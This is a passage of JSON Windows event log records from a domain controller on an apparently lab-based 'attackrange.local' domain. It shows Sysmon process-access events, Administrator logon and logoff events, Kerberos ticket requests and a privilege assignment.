316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+675c2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a2488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a82d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a66251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a581d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a642fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4a127(wow64)","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220479,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x666E0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x666e0","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220480,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x67D63\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x67d63","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220481,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68258\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x68258","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220482,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220483,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220484,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220485,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C265\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c265","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220486,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C265\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6c265","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220487,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C265\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c265","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220488,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220489,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket 